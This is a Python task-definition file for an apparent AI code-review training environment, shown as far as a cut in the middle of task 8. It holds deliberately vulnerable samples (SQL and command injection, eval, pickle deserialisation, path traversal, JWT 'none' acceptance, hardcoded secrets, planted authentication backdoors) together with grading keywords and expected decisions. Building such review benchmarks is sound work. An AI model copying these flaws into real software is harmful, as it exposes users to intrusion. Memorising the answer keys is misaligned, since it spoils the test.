""" Task definitions for the PRobe environment. Six tasks across four difficulty tiers. Each task defines: - code: Python source to review - issues: list of ground-truth issues with grading metadata - correct_decision: expected final review decision Difficulty ladder: 0 ultra-easy — hints embedded in comments; bootstraps GRPO positive trajectories 1 easy — 3 clean logic bugs, no hints 2 medium — 5 security issues in an auth module 3 hard — 7 mixed issues in a data pipeline 4 medium — 5 async concurrency bugs 5 hard — 6 Flask API security issues """ from typing import Any TASKS: list[dict[str, Any]] = [ # ── Task 0: Ultra-easy (bootstrap) ─────────────────────────────────────── # DESIGN INTENT: both issues have their category name spelled out in a code # comment directly above them. A frozen weak model that simply reads the # comments and echoes them back should reliably score > 0. This task exists # solely to guarantee that GRPO has at least a few positive trajectories from # training step 1. { "id": 0, "name": "Bootstrap: Obvious Issues", "difficulty": "ultra-easy", "file_name": "bootstrap.py", "description": ( "Review this short Python module. " "The comments above each function hint at the kind of issue present. " "Add a comment for each bug you find (line number, severity, category), " "call request_changes, then submit." 
), "max_steps": 6, "code": """\ # BUG: this loop has an off-by-one error — it iterates one index too far def sum_items(data): total = 0 for i in range(len(data) + 1): # line 4: causes IndexError on last iteration total += data[i] return total # SECURITY: hardcoded credential — move to environment variable def connect_db(): db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source return f"postgresql://admin:{db_password}@localhost/mydb" """, "issues": [ { "id": "bootstrap_off_by_one", "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", "line_range": (4, 4), "keywords": [ "off-by-one", "off by one", "bug", "index", "indexerror", "range", "+ 1", "len + 1", "out of bounds", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "bootstrap_hardcoded_cred", "description": "Hardcoded password in source should be an environment variable", "line_range": (11, 11), "keywords": [ "hardcoded", "hard-coded", "security", "credential", "password", "secret", "env", "environment variable", "os.environ", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", }, # ── Task 1: Easy ───────────────────────────────────────────────────────── { "id": 1, "name": "Basic Bug Detection", "difficulty": "easy", "file_name": "utils.py", "description": ( "Review this Python utility module. " "Identify any bugs, logical errors, or code quality issues. " "Add a comment for each issue you find (include line number, severity, " "and category), then submit your review." 
), "max_steps": 15, "code": """\ def calculate_average(numbers): \"\"\"Calculate the average of a list of numbers.\"\"\" total = 0 for i in range(len(numbers) + 1): # line 4 total += numbers[i] average = total / len(numbers) unused_result = sorted(numbers) # line 7 return average def find_max(items): \"\"\"Return the maximum value in a list.\"\"\" if len(items) == 0: return None max_val = items[0] for item in items: if item > max_val: max_val == item # line 17: should be =, not == return max_val def is_palindrome(s): \"\"\"Check if a string is a palindrome.\"\"\" return s == s[::-1] """, "issues": [ { "id": "off_by_one", "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", "line_range": (4, 5), "keywords": [ "off-by-one", "off by one", "range", "index", "indexerror", "out of bounds", "len + 1", "+ 1", "index out", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "unused_variable", "description": "unused_result is assigned but never used", "line_range": (7, 7), "keywords": [ "unused", "unused_result", "never used", "dead code", "not used", "unnecessary", ], "category": "style", "severity": "info", "weight": 0.5, }, { "id": "assignment_not_update", "description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated", "line_range": (17, 17), "keywords": [ "==", "assignment", "comparison", "max_val", "never update", "not updating", "wrong operator", "should be =", "max never", ], "category": "bug", "severity": "error", "weight": 1.0, }, ], "correct_decision": "request_changes", }, # ── Task 2: Medium ─────────────────────────────────────────────────────── { "id": 2, "name": "Security Vulnerability Review", "difficulty": "medium", "file_name": "auth.py", "description": ( "Review this authentication module for security vulnerabilities. " "Pay careful attention to credential handling, input sanitization, " "and cryptographic choices. 
Annotate every issue with its severity " "and category, then submit your review." ), "max_steps": 20, "code": """\ import sqlite3 import hashlib import os DB_PASSWORD = "super_secret_123" # line 5 ADMIN_TOKEN = "tok_admin_abc123" # line 6 def authenticate_user(username, password): \"\"\"Authenticate a user against the database.\"\"\" conn = sqlite3.connect('app.db') cursor = conn.cursor() # line 12: f-string interpolation → SQL injection query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" cursor.execute(query) user = cursor.fetchone() conn.close() return user is not None def hash_password(password): \"\"\"Hash a password for storage.\"\"\" return hashlib.md5(password.encode()).hexdigest() # line 21 def execute_admin_command(command): \"\"\"Execute an admin maintenance command.\"\"\" result = eval(command) # line 25 return result def get_user_data(user_id): \"\"\"Fetch user profile from internal service.\"\"\" import requests url = f"https://internal-api/users/{user_id}" response = requests.get(url, verify=False) # line 32 return response.json() """, "issues": [ { "id": "hardcoded_credentials", "description": "Credentials hard-coded in source (lines 5-6)", "line_range": (5, 6), "keywords": [ "hardcoded", "hard-coded", "hard coded", "hardcode", "db_password", "admin_token", "plaintext credential", "environment variable", "env var", "os.environ", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "sql_injection", "description": "SQL injection via unsanitised f-string interpolation", "line_range": (12, 14), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "sanitize", "escape", "prepared statement", "placeholder", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "weak_hashing", "description": "MD5 is cryptographically broken for password storage", "line_range": (21, 21), "keywords": [ "md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt", 
"cryptographic", "password hashing", "hash", "broken", ], "category": "security", "severity": "error", "weight": 0.75, }, { "id": "arbitrary_code_execution", "description": "eval() on untrusted input allows arbitrary code execution", "line_range": (25, 25), "keywords": [ "eval", "arbitrary code", "code execution", "rce", "remote code", "dangerous", "unsafe", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "ssl_verification_disabled", "description": "verify=False disables TLS cert validation, enabling MITM attacks", "line_range": (32, 32), "keywords": [ "ssl", "verify", "certificate", "mitm", "man-in-the-middle", "tls", "verify=false", "cert", ], "category": "security", "severity": "error", "weight": 0.75, }, ], "correct_decision": "request_changes", }, # ── Task 3: Hard ───────────────────────────────────────────────────────── { "id": 3, "name": "Full Architecture and Performance Review", "difficulty": "hard", "file_name": "data_pipeline.py", "description": ( "Perform a comprehensive review of this data pipeline. " "Identify bugs, security vulnerabilities, performance bottlenecks, " "and architectural design issues. Each comment should clearly explain " "the problem and suggest a fix. Submit your review when done." 
), "max_steps": 30, "code": """\ import requests import json import time from threading import Thread API_KEY = "sk-prod-abc123def456" # line 6 class DataPipeline: def __init__(self, endpoint): self.endpoint = endpoint self.results = [] self.cache = {} # line 13: unbounded def fetch_batch(self, item_ids): \"\"\"Fetch items from the API.\"\"\" items = [] for item_id in item_ids: # line 17: N+1 pattern response = requests.get( f"{self.endpoint}/items/{item_id}", headers={"Authorization": f"Bearer {API_KEY}"}, verify=False, # line 22 ) items.append(response.json()) return items def process_items(self, items): \"\"\"Transform items for storage.\"\"\" results = [] for i in range(len(items)): # line 28: use enumerate item = items[i] transformed = { "id": item["id"], # line 31: KeyError not handled "value": item["value"] * 2, "label": item.get("label", "unknown"), } results.append(transformed) self.cache[item["id"]] = transformed # line 36 return results def run_async(self, func, *args): \"\"\"Run function in a background thread.\"\"\" t = Thread(target=func, args=args) t.start() # line 43: thread not tracked or joined — resource leak def save_results(self, results, output_path): \"\"\"Persist results to disk.\"\"\" with open(output_path, "w") as f: json.dump(results, f) def retry_failed(self, failed_ids, max_retries=10): # line 50 \"\"\"Re-fetch items that previously failed.\"\"\" for item_id in failed_ids: for attempt in range(max_retries): try: result = requests.get( f"{self.endpoint}/items/{item_id}" ) if result.status_code == 200: self.results.append(result.json()) break except Exception: time.sleep(1) # line 60: no exponential backoff """, "issues": [ { "id": "hardcoded_api_key", "description": "API key hard-coded in source instead of an environment variable", "line_range": (6, 6), "keywords": [ "hardcoded", "hard-coded", "hardcode", "api key", "api_key", "environment variable", "env var", "os.environ", "sk-prod", ], "category": "security", "severity": "critical", 
"weight": 1.0, # Reveals batch endpoint docs — shows N+1 was also avoidable "unlocks": "api_docs_hint", }, { "id": "n_plus_one_requests", "description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint", "line_range": (17, 24), "keywords": [ "n+1", "n plus 1", "batch", "bulk", "loop", "individual request", "serial", "one request per", ], "category": "performance", "severity": "error", "weight": 1.0, }, { "id": "ssl_disabled", "description": "SSL certificate verification disabled (verify=False)", "line_range": (22, 22), "keywords": [ "ssl", "verify", "certificate", "tls", "mitm", "verify=false", "cert", ], "category": "security", "severity": "error", "weight": 0.75, # Reveals network topology — confirms direct internet exposure "unlocks": "network_topology_hint", }, { "id": "missing_key_error_handling", "description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads", "line_range": (31, 32), "keywords": [ "keyerror", "key error", "error handling", "missing key", "exception", "try", ".get(", "dict access", ], "category": "bug", "severity": "warning", "weight": 0.75, }, { "id": "unbounded_cache", "description": "self.cache grows without bound; will cause OOM on large inputs", "line_range": (13, 13), "keywords": [ "unbounded", "memory leak", "cache size", "limit", "lru", "eviction", "grow", "oom", "memory", ], "category": "design", "severity": "warning", "weight": 0.75, }, { "id": "thread_not_joined", "description": "Thread is started but never stored or joined — silent resource/exception leak", "line_range": (40, 43), "keywords": [ "thread", "join", "track", "resource leak", "daemon", "not joined", "not tracked", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "no_exponential_backoff", "description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API", "line_range": (50, 60), "keywords": [ "backoff", "exponential", "retry", "sleep", "rate limit", 
"jitter", "aggressive", ], "category": "design", "severity": "warning", "weight": 0.5, }, ], "correct_decision": "request_changes", # ── Causal context hints ────────────────────────────────────────── # Finding the hardcoded API key reveals the upstream API docs, showing # a bulk endpoint exists — making the N+1 pattern even more damning. # Finding the SSL issue reveals the network topology, confirming the # service is directly internet-facing with no TLS termination proxy. "context_hints": { "api_docs_hint": ( "=== UNLOCKED: Upstream API Documentation (excerpt) ===\n" " GET /items/{id} — fetch a single item\n" " POST /items/batch — fetch up to 500 items in one request\n" " body: {\"ids\": [1, 2, ...]}\n" "NOTE: A batch endpoint already exists. The current code issues one\n" "request per item instead of using /items/batch, amplifying the\n" "credential-exposure risk: every request carries the leaked API_KEY." ), "network_topology_hint": ( "=== UNLOCKED: Deployment Network Map ===\n" " Internet → DataPipeline service (no TLS proxy) → upstream API\n" " The DataPipeline pod has a public IP and no WAF in front of it.\n" "NOTE: verify=False combined with direct internet exposure means\n" "any network path between the pod and the upstream API is vulnerable\n" "to a man-in-the-middle attack with no detection mechanism." ), }, }, # ── Task 4: Medium — Async Concurrency ─────────────────────────────── { "id": 4, "name": "Async Worker Review", "difficulty": "medium", "file_name": "async_worker.py", "description": ( "Review this async worker module for concurrency bugs, " "resource leaks, and exception-handling problems. " "Comment on every issue with its line number, severity, " "and category, then submit your review." 
), "max_steps": 20, "code": """\ import asyncio import aiohttp _counter = 0 # line 3: shared mutable state, not thread/task-safe async def fetch_url(url: str) -> dict: \"\"\"Fetch a URL and return JSON.\"\"\" session = aiohttp.ClientSession() # line 7: session never closed → resource leak async with session.get(url) as resp: return await resp.json() async def increment_and_fetch(url: str) -> dict: \"\"\"Increment shared counter then fetch.\"\"\" global _counter _counter += 1 # line 15: race condition — not atomic in concurrent tasks data = fetch_url(url) # line 16: missing await → returns coroutine, not result return data async def run_all(urls: list) -> list: \"\"\"Run all fetches concurrently.\"\"\" tasks = [increment_and_fetch(u) for u in urls] results = [] for coro in tasks: try: result = await coro results.append(result) except Exception: pass # line 27: swallows all exceptions silently return results async def retry_fetch(url: str, retries: int = 3) -> dict: \"\"\"Fetch with retry logic.\"\"\" for attempt in range(retries): try: return await fetch_url(url) except Exception as e: if attempt == retries - 1: raise await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff """, "issues": [ { "id": "shared_mutable_state", "description": "Module-level _counter mutated by concurrent tasks without a lock", "line_range": (3, 3), "keywords": [ "shared", "race condition", "thread-safe", "task-safe", "atomic", "lock", "asyncio.lock", "concurrent", "global", "mutable", "not safe", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "unclosed_session", "description": "aiohttp.ClientSession created inside function is never closed → resource leak", "line_range": (7, 9), "keywords": [ "session", "not closed", "resource leak", "close", "context manager", "async with", "clientsession", "leak", "aiohttp", ], "category": "bug", "severity": "error", "weight": 1.0, }, { "id": "missing_await", "description": "fetch_url(url) called without await — returns 
unawaited coroutine", "line_range": (16, 16), "keywords": [ "await", "missing await", "coroutine", "not awaited", "unawaited", "returns coroutine", ], "category": "bug", "severity": "critical", "weight": 1.0, }, { "id": "silent_exception", "description": "bare except: pass swallows all exceptions, hiding errors", "line_range": (27, 27), "keywords": [ "swallow", "silent", "bare except", "exception", "pass", "ignore", "hidden", "suppress", "logging", ], "category": "design", "severity": "warning", "weight": 0.75, }, { "id": "no_backoff", "description": "Retry sleep is flat 1 s; should use exponential backoff with jitter", "line_range": (38, 38), "keywords": [ "backoff", "exponential", "jitter", "retry", "sleep", "flat", "rate limit", ], "category": "design", "severity": "warning", "weight": 0.5, }, ], "correct_decision": "request_changes", }, # ── Task 5: Hard — Flask API Vulnerabilities ────────────────────────── { "id": 5, "name": "Flask API Security Review", "difficulty": "hard", "file_name": "api_server.py", "description": ( "Perform a thorough security review of this Flask REST API. " "Look for injection flaws, path traversal, insecure deserialization, " "sensitive data exposure, and missing access controls. " "Comment on every issue, then submit your review." 
), "max_steps": 30, "code": """\ import os import pickle import subprocess import logging from flask import Flask, request, jsonify, send_file app = Flask(__name__) SECRET_KEY = "flask-secret-hardcoded" # line 8 logging.basicConfig(level=logging.DEBUG) @app.route("/run", methods=["POST"]) def run_command(): \"\"\"Run a system command and return output.\"\"\" cmd = request.json.get("command", "") # line 15: unsanitised shell command → OS command injection result = subprocess.check_output(cmd, shell=True, text=True) return jsonify({"output": result}) @app.route("/files", methods=["GET"]) def get_file(): \"\"\"Serve a file from the data directory.\"\"\" filename = request.args.get("name", "") # line 23: no path normalisation → path traversal path = os.path.join("/app/data", filename) return send_file(path) @app.route("/load", methods=["POST"]) def load_object(): \"\"\"Deserialise a user-supplied payload.\"\"\" data = request.get_data() # line 30: pickle.loads on untrusted data → arbitrary code execution obj = pickle.loads(data) return jsonify({"type": str(type(obj))}) @app.route("/login", methods=["POST"]) def login(): \"\"\"Authenticate and return a token.\"\"\" username = request.json.get("username") password = request.json.get("password") # line 38: credentials logged at DEBUG level logging.debug(f"Login attempt: username={username} password={password}") if username == "admin" and password == SECRET_KEY: return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response return jsonify({"error": "unauthorized"}), 401 @app.route("/admin", methods=["GET"]) def admin_panel(): \"\"\"Return admin data — no auth check.\"\"\" # line 47: no authentication or authorisation check return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}}) """, "issues": [ { "id": "hardcoded_secret", "description": "Flask SECRET_KEY hard-coded in source; should come from env var", "line_range": (8, 8), "keywords": [ "hardcoded", "hard-coded", "secret_key", 
"environment variable", "env var", "os.environ", "secret", "hardcode", ], "category": "security", "severity": "critical", "weight": 0.75, }, { "id": "command_injection", "description": "subprocess.check_output with shell=True and unsanitised user input → OS command injection", "line_range": (15, 16), "keywords": [ "command injection", "shell injection", "shell=true", "subprocess", "os injection", "arbitrary command", "unsanitised", "sanitize", "injection", ], "category": "security", "severity": "critical", "weight": 1.0, # Reveals server deployment config — shows shell access = full host compromise "unlocks": "server_config_hint", }, { "id": "path_traversal", "description": "No path normalisation allows ../../../etc/passwd-style traversal", "line_range": (23, 24), "keywords": [ "path traversal", "directory traversal", "path normaliz", "os.path.abspath", "realpath", "../", "dot dot", "escape", "filename", "traversal", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "insecure_deserialization", "description": "pickle.loads on untrusted user data allows arbitrary code execution", "line_range": (30, 31), "keywords": [ "pickle", "deserialization", "deserialisation", "arbitrary code", "untrusted", "rce", "remote code", "insecure deserialization", ], "category": "security", "severity": "critical", "weight": 1.0, # Reveals client usage pattern — shows external clients send pickle payloads "unlocks": "client_usage_hint", }, { "id": "credentials_in_logs", "description": "Plaintext username and password written to DEBUG log", "line_range": (38, 38), "keywords": [ "log", "logging", "credential", "password", "sensitive", "plaintext", "debug", "leak", "exposure", ], "category": "security", "severity": "error", "weight": 0.75, }, { "id": "missing_auth_check", "description": "Admin endpoint has no authentication or authorisation guard", "line_range": (47, 47), "keywords": [ "auth", "authentication", "authorization", "authorisation", "access control", 
"no check", "unprotected", "unauthenticated", "missing auth", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", # ── Causal context hints ────────────────────────────────────────── # Finding command_injection reveals the host deployment context, # escalating severity from "code bug" to "full host compromise". # Finding insecure_deserialization reveals client usage patterns, # confirming the /load endpoint is actively used by external scripts. "context_hints": { "server_config_hint": ( "=== UNLOCKED: Server Deployment Configuration ===\n" " The Flask app runs as root inside a Docker container with:\n" " --privileged flag set\n" " host network mode (--network=host)\n" " /var/run/docker.sock mounted read-write\n" "NOTE: Command injection on this host is not just a container escape —\n" "the app runs as root with Docker socket access, giving an attacker\n" "full control of the host and all sibling containers." ), "client_usage_hint": ( "=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n" " # Example client code used by 3 internal services:\n" " import pickle, requests\n" " payload = pickle.dumps(MyObject(user_input))\n" " requests.post('https://api.internal/load', data=payload)\n" "NOTE: At least 3 internal services send user-controlled pickle\n" "payloads to /load. Any of those services being compromised allows\n" "a lateral-movement RCE attack through this endpoint." ), }, }, # ── Task 6: Causal Chain — Secrets Leak Investigation ──────────────────── # # WORLD-MODELING DESIGN # ───────────────────── # This task implements a *causal observation chain*: # # Phase 1 (lines visible from the start) # The agent sees a Flask service with two obvious surface issues. # Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context. 
# # Phase 2 (revealed after issue A is found) # A hidden DB schema snippet is appended to the observation, exposing # a privilege-escalation path that only makes sense once the secret # leak is understood. This rewards genuine causal reasoning: # "the leaked secret lets an attacker forge admin tokens → they can # reach the unguarded /admin/promote endpoint → full privilege # escalation." # # Phase 3 (revealed after issue B is found) # After the agent flags the missing rate-limit, the server's nginx # config fragment is revealed, showing that /auth is also missing # the global IP-allowlist — confirming the attack surface is wider # than the code alone suggests. # # The chained field `"unlocks"` in each issue entry names the context_key # that the environment injects into the observation when that issue is found. # The environment layer reads this and appends the hint to `context_hints`. { "id": 6, "name": "Causal Secrets Leak Investigation", "difficulty": "hard", "file_name": "auth_service.py", "description": ( "Review this authentication service carefully. " "Some issues unlock additional context about the wider system — " "read every new hint you receive before continuing. " "Use get_context on any suspicious line to reveal surrounding detail. " "Identify all issues, then submit your review." 
), "max_steps": 35, "code": """\ import jwt import sqlite3 import time from flask import Flask, request, jsonify app = Flask(__name__) # ---- configuration ---------------------------------------------------------- JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret JWT_ALGORITHM = "HS256" # ---- helpers ---------------------------------------------------------------- def create_token(user_id: int, role: str) -> str: payload = { "sub": user_id, "role": role, "exp": time.time() + 3600, } return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) def verify_token(token: str) -> dict: # line 23: algorithm not pinned — accepts ["none"] attack if lib < 2.0 return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"]) # ---- routes ----------------------------------------------------------------- @app.route("/auth", methods=["POST"]) def authenticate(): \"\"\"Issue a JWT for valid credentials.\"\"\" body = request.get_json(force=True) uname = body.get("username", "") pwd = body.get("password", "") # line 33: no rate limiting → brute-force possible conn = sqlite3.connect("users.db") cursor = conn.cursor() # line 37: f-string SQL → injection cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'") row = cursor.fetchone() conn.close() if row: return jsonify({"token": create_token(row[0], row[1])}) return jsonify({"error": "invalid credentials"}), 401 @app.route("/admin/promote", methods=["POST"]) def promote_user(): \"\"\"Promote a user to admin — JWT required.\"\"\" token = request.headers.get("Authorization", "").replace("Bearer ", "") try: claims = verify_token(token) except Exception: return jsonify({"error": "unauthorized"}), 401 # line 51: role taken directly from token — no DB re-validation if claims.get("role") == "admin": target = request.json.get("user_id") conn = sqlite3.connect("users.db") conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection conn.commit() 
conn.close() return jsonify({"promoted": target}) return jsonify({"error": "forbidden"}), 403 """, # ── Ground-truth issues ─────────────────────────────────────────── "issues": [ { "id": "hardcoded_jwt_secret", "description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens", "line_range": (9, 9), "keywords": [ "hardcoded", "hard-coded", "jwt_secret", "secret", "jwt", "environment variable", "env var", "os.environ", "forge", "hardcode", "token secret", ], "category": "security", "severity": "critical", "weight": 1.0, # Finding this issue unlocks the DB schema context hint "unlocks": "db_schema_hint", }, { "id": "jwt_none_algorithm", "description": ( "jwt.decode accepts 'none' algorithm — attacker can craft an " "unsigned token and bypass signature verification" ), "line_range": (23, 24), "keywords": [ "none", "algorithm", "alg", "unsigned", "bypass", "jwt", "signature", "verify", "none algorithm", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "no_rate_limit", "description": "/auth endpoint has no rate limiting — susceptible to brute-force", "line_range": (33, 34), "keywords": [ "rate limit", "rate-limit", "brute force", "brute-force", "throttle", "throttling", "flood", "limit", "attempts", ], "category": "security", "severity": "error", "weight": 0.75, # Finding this unlocks the nginx config hint "unlocks": "nginx_config_hint", }, { "id": "sql_injection_auth", "description": "f-string interpolation in SQL query on /auth → injection", "line_range": (37, 38), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "sanitize", "escape", "prepared statement", "placeholder", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "role_from_token_only", "description": ( "Role is read directly from the JWT payload without re-checking the DB — " "a forged or stale token grants permanent privilege" ), "line_range": (51, 52), "keywords": [ "role", "token", "db", "database", 
"re-check", "revalidat", "stale", "privilege", "escalation", "claims", "payload", "not verified", "trust", ], "category": "security", "severity": "critical", "weight": 1.0, }, { "id": "sql_injection_promote", "description": "f-string SQL in /admin/promote UPDATE query → second-order injection", "line_range": (55, 55), "keywords": [ "sql injection", "sql", "injection", "f-string", "parameterized", "prepared statement", "placeholder", "update", "second order", ], "category": "security", "severity": "critical", "weight": 1.0, }, ], "correct_decision": "request_changes", # ── Causal context hints — revealed progressively ───────────────── # Each value is injected into the observation once the triggering # issue is found. The agent must incorporate this new information # into its ongoing world model. "context_hints": { "db_schema_hint": ( "=== UNLOCKED: Database Schema (users.db) ===\n" " CREATE TABLE users (\n" " id INTEGER PRIMARY KEY,\n" " username TEXT UNIQUE NOT NULL,\n" " password TEXT NOT NULL, -- stored as plaintext!\n" " role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n" " );\n" "NOTE: The /admin/promote endpoint can elevate any user to 'admin'. " "Combined with a forged JWT (from the leaked secret), an attacker " "can reach this endpoint with admin claims and promote themselves." ), "nginx_config_hint": ( "=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n" " location /auth {\n" " proxy_pass http://auth_service:5000;\n" " # no ip_allowlist, no limit_req_zone\n" " }\n" "NOTE: The nginx layer adds no rate-limiting or IP filtering " "in front of /auth, confirming the brute-force surface is " "fully exposed to the internet." 
), }, }, # ── Task 7: Adversarial — Simple Obfuscated Backdoor ───────────────────── # # ADVERSARIAL DESIGN # ────────────────── # A malicious contributor submitted a "fix for timing issues" but embedded # a deliberate backdoor: a hardcoded bypass credential that looks like a # leftover debug constant, plus a subtle branch that lets any request with # X-Debug-Token skip authentication entirely. # # The agent must: # 1. Find the bypass credential AND the debug-token branch # 2. Classify BOTH as intentional_backdoor (not accidental_bug) # 3. Choose escalate_to_security_review (not request_changes) # # Partial credit: finding issues but misclassifying → partial reward only { "id": 7, "name": "Adversarial: Debug Bypass Backdoor", "difficulty": "adversarial", "file_name": "session_manager.py", "description": ( "This PR was submitted by an external contributor as a 'timing fix'. " "Review this session management module carefully. " "Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. " "If you find evidence of a deliberate backdoor, escalate to security review " "instead of requesting changes." 
), "max_steps": 25, "escalation_required": True, "code": """\ import hmac import hashlib import os import time # Timing-safe comparison helper added in this PR _DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant SESSION_TIMEOUT = 3600 def verify_session(token: str, stored_hash: str) -> bool: \"\"\"Verify a session token using timing-safe comparison.\"\"\" # line 13: debug bypass — any request with this key skips verification if token == _DEBUG_MASTER_KEY: return True expected = hashlib.sha256(token.encode()).hexdigest() return hmac.compare_digest(expected, stored_hash) def create_session(user_id: int) -> dict: \"\"\"Create a new session for a user.\"\"\" token = os.urandom(32).hex() return { "user_id": user_id, "token": token, "expires_at": time.time() + SESSION_TIMEOUT, "created_at": time.time(), } def is_expired(session: dict) -> bool: \"\"\"Check if a session has expired.\"\"\" return time.time() > session["expires_at"] def refresh_session(session: dict) -> dict: \"\"\"Extend session expiry if it is still valid.\"\"\" if is_expired(session): raise ValueError("Cannot refresh expired session") session["expires_at"] = time.time() + SESSION_TIMEOUT return session """, "issues": [ { "id": "backdoor_master_key", "description": ( "Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential " "that bypasses all authentication — not a leftover debug constant" ), "line_range": (7, 7), "keywords": [ "hardcoded", "backdoor", "bypass", "master key", "debug key", "intentional", "deliberate", "_debug_master_key", "secret", "authentication bypass", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "git_blame_hint", }, { "id": "backdoor_bypass_branch", "description": ( "The token == _DEBUG_MASTER_KEY branch unconditionally returns True, " "granting any caller full session access without a valid token" ), "line_range": (13, 15), "keywords": [ "bypass", "backdoor", "unconditional", 
"always true", "skip", "debug_master_key", "comparison", "authentication bypass", "returns true", "branch", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "git_blame_hint": ( "=== UNLOCKED: Git Blame — session_manager.py line 7 ===\n" " commit a3f9c12 (external-contributor, 3 days ago)\n" " Author: pr-bot-4471 \n" " Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n" "\n" "NOTE: The commit message claims to REMOVE debug artifacts, yet this\n" "line was ADDED in this commit. The contributor's account (pr-bot-4471)\n" "was created 4 days ago and has no prior commit history in this org.\n" "This strongly suggests the 'debug constant' was intentionally planted." ), }, }, # ── Task 8: Adversarial — Compound Backdoor (JWT + Timing Oracle) ───────── # # ADVERSARIAL DESIGN # ────────────────── # The PR claims to "harden JWT validation". In reality it introduces TWO # coordinated backdoor components that are only dangerous together: # Component A (line 7): weakens the HMAC secret to a known value # Component B (line 34): introduces a timing oracle via non-constant-time compare # # Neither component alone is immediately catastrophic, but together they allow # an attacker to: (1) use the known weak secret to forge a valid JWT, # then (2) use the timing oracle to confirm which tokens are accepted, # enabling account takeover without any brute-force detection. # # This is the hardest adversarial task — requires multi-step causal reasoning. { "id": 8, "name": "Adversarial: Compound Backdoor (JWT Hardening PR)", "difficulty": "adversarial", "file_name": "jwt_validator.py", "description": ( "This PR was submitted as a 'JWT validation hardening'. " "Review the changes carefully. Some issues may only be dangerous in combination. " "Use get_context to investigate suspicious lines before commenting. 
" "Classify each issue as 'accidental_bug' or 'intentional_backdoor'. " "Escalate to security review if you find coordinated backdoor components." ), "max_steps": 35, "escalation_required": True, "code": """\ import jwt import hmac import hashlib import time # PR description: 'Harden JWT validation — use deterministic secret derivation' # line 7: secret derived from a fixed seed — looks like a 'standardisation' change JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7 SUPPORTED_ALGORITHMS = ["HS256"] TOKEN_EXPIRY = 3600 def create_token(user_id: int, role: str) -> str: \"\"\"Create a signed JWT for the given user.\"\"\" payload = { "sub": user_id, "role": role, "exp": int(time.time()) + TOKEN_EXPIRY, "iat": int(time.time()), } return jwt.encode(payload, JWT_SECRET, algorithm="HS256") def validate_token(token: str) -> dict | None: \"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\" try: claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS) return claims except jwt.InvalidTokenError: return None def is_admin_token(token: str, admin_token: str) -> bool: \"\"\"Check if a token matches the stored admin token.\"\"\" # line 34: str == comparison instead of hmac.compare_digest → timing oracle return token == admin_token def refresh_if_expiring(claims: dict) -> bool: \"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\" return claims.get("exp", 0) - time.time() < 300 """, "issues": [ { "id": "weak_jwt_secret", "description": ( "JWT_SECRET derived from MD5 of a fixed seed produces a known, " "reproducible 32-char hex string — any attacker with the source " "can precompute it and forge valid tokens" ), "line_range": (7, 7), "keywords": [ "md5", "weak secret", "fixed seed", "deterministic", "reproducible", "jwt_secret", "precompute", "forge", "known secret", "hardcoded", "backdoor", "intentional", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": 
